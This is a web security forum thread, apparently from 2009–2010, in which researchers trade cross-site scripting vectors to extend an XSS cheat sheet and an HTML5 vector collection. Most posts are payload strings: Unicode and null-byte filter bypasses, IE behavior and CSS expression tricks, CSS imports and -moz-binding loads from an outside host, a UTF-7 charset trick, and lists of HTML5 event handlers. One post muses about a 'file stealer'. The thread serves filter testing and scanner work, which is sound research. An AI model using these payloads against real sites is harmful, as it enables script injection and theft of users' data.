@thornmaker yeah, add "Thornmaker, CISSP" in your signature :} -- be proud! it's okay you know...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

I think you should have a CISSP pride day

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

i don't want to see thornmaker dancing almost naked in the street with his CISSP certif folded in fig leaf... O_o

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

oh god..

dross and jeremiah are also CISSP iirc heh

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Oh, this is not very well known, so...

<&#383;cript>

changes to <SCRIPT> when:

"\u017fcript".toUpperCase()

unicode for the win!

credit goes to chris weber that guy rocks..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 08/16/2009 09:55PM by sirdarckcat.

o



Edited 1 time(s). Last edit at 10/16/2009 03:25AM by philip_clarke.

Continue!

1.

Quote
ha.ckers.org/xss2.html

<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">

The power of this vector is still not fully identified and it generates questions. This should be replaced by

<P STYLE="behavior:url('#default#time2')" end="0" onEnd="alert('XSS')">

or better

<P STYLE="behavior:url('#default#time2')" onBegin="alert('XSS')">

.

I already wrote about this.

2.

Quote
ha.ckers.org/xss2.html

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@im\port'ht\tp://ha.c\kers.org/xss-retest.css';</STYLE>

Need to add:

<STYLE>a{background:url('s1' 's2)}@import javascript:alert(1);');}</STYLE>

// IE 6


or better

<STYLE>a{background:url('s1' 's2)}@import url(http://ha.ckers.org/xss.css);');}</STYLE>

// IE 6-8 (breaking out of css-string + rules after something)


to your taste...

3.

Quote
ha.ckers.org/xss2.html

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

It should be replaced:

<STYLE>BODY{property:"
invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);"}</STYLE>

//FF 3.6 + breaking out of css-string


or better

<body style="property:'&#10invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);'">

4.

Quote
ha.ckers.org/xss2.html

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

// IE (in tag)

perl -e 'print "<IMG SRC=\"\" o\0nerror=alert(\"XSS\")>";' > out

// IE (in attribute)

Need to add:

perl -e 'print "<IMG\0zzz SRC=\"\" onerror\0zzz=alert(\"XSS\")>";' > out

// GC 4 & Safari 4.0.4 (right side (after \0) in the tagname and attribute is ignored, but left side is valid)


And the logical conclusion:

perl -e 'print "<IMG STYLE=xss:expr/\0*XSS*\0/ession(alert(\"XSS\"))>";' > out

// IE (in parameter, bypass filtering comments). This comment is also valid in GC & Safari, if stylesheet into "<style>".



@all, the show must go on!!!


P.S.

Quote
rsnake
Posted by: rsnake
Date: August 10, 2009

Quote
ha.ckers.org/xss2.html
Check back in a week or two!

:D:D:D


upd1: @Gareth, nice! haha :)) Yep, <imitation>I'll do my own</imitation>


LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/04/2010 03:18AM by LeverOne.

@LeverOne

<sarcasm>I'm sorry your vectors contain a single quote this is already on the cheatsheet, we don't include vectors that can be made using elements of previous vectors.......</sarcasm>


<praise>
Nice vectors! I like your CSS break out
</praise>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/04/2010 02:51AM by Gareth Heyes.

Am I late to the party?

whitelist bypassing;


<img src= alt=" onerror=alert(1)//">



Edited 1 time(s). Last edit at 03/15/2010 04:21AM by Kyo.

@Kyo

Nice idea that actually, but any good whitelist will either drop the src or rewrite it. Still nice vector though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

It's helped me at least once :)

What about this one? Works on IE8 and IE9

<style>@import'vb\script:alert(1)</style>

Edited 1 time(s). Last edit at 03/17/2010 03:43PM by .mario.

Despite the assumption the XSS cheat sheet has other purposes than being an XSS cheat sheet - here's some new meat (all Gecko based user agents):

<meta charset="x-imap4-modified-utf7"&&>&&<script&&>alert(1)&&;&&<&&/script&&>

That's pretty cool

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Okay - it's on!

http://code.google.com/p/html5security/

http://code.google.com/p/html5security/source/browse/#svn/trunk

@mario

Sweeeeeeet

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@mario

Why onfocus & onblur? or the other list of inline events and style for that matter? they are already known right?

@Skyphire: onfocus and onblur usually require user interaction - with HTML5 autofocus attributes the don't anymore.

Ohmy... "Autofocus" *sigh* there we go. Didn't know about that, cool actually. it brings some more logic to HTML. I wonder if we can bubble the focus to another element this way, then we might have some cool file stealer going on. ;)

So - after adding almost 30 vectors it's time to show where and how the action happens (don't bookmark - the domain will change and I will keep u posted)

http://heideri.ch/jso/

No SEO, no jizz nor goo - just an attempt to create a place where this madness is being collected to be freely available for whatever you need it. Scanners, your own internal cheat sheet, ... up to you. You got a contribution? Ping me or one of the other project owners:

http://code.google.com/p/html5security/

More vectors coming tomorrow.

New HTML5 event handler:

oninput=""

Browser test page: http://jsbin.com/efalu/7

http://heideri.ch/jso/#86 Nice - found out during testing that Safari does autofocus too meanwhile - tsts

onhashchange="event"

hehe.


Provided code by whatwg:

<!DOCTYPE HTML>
<html>
 <head>
  <title>onhashchange</title>
 </head>
 <body onload="update()" onhashchange="update()">
  <h1>onhashchange</h1>

  <p><a href="#a">AAAA</a> <a href="#b">BBBB</a></p>

  <p id=message>...</p>

  <script>

   function update() {
     if (location.hash) {
       var msg = location.hash.substr(1);
       document.getElementById('message').firstChild.data = msg;
     }
   }

  </script>

 </body>
</html>

Edited 1 time(s). Last edit at 05/22/2010 07:21AM by Skyphire.

Haven't checked these, but im sure there are a couple new ones.

    onafterprint
    onbeforeprint
    onbeforeunload
    onemptied
    ondurationchange
    onhashchange
    onmessage
    onoffline
    ononline
    onpagehide
    onplaying
    onpageshow
    oncanplay
    onpopstate
    onratechange
    onredo
    onresize
    onreset
    onstorage
    onseeking
    onsuspend
    onstalled
    onundo
    onunload
    onwebkitanimationiteration
    onwebkittransitionend

Edited 1 time(s). Last edit at 05/22/2010 07:48AM by Skyphire.